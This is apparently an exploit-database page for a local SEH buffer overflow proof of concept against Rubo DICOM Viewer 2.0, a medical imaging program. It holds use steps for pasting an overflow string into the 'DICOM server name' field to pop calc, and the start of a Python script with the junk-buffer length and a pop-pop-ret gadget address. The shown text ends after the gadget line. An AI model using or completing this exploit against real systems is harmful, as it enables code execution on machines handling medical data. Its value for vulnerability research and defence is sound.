Exploits / Vulnerability Discovered : 2020-04-20 |
Type : local |
Platform : windows
This exploit / vulnerability Rubo dicom viewer 2.0 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Date: 2020-04-17
# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
# Vendor Homepage: http://www.rubomedical.com/
# Version: 2.0
# Software Link : http://www.rubomedical.com/download/index.php
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate overview.txt, copy contents to clipboard
# 2. open application
# 3. select send dicom files, edit
# 4. paste contents from clipBoard to "DICOM server name" field
# 6. pop calc
#!/usr/bin/python
import struct
junk1 = "A"*1868
#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
seh = struct.pack('<L',0x00402f0e)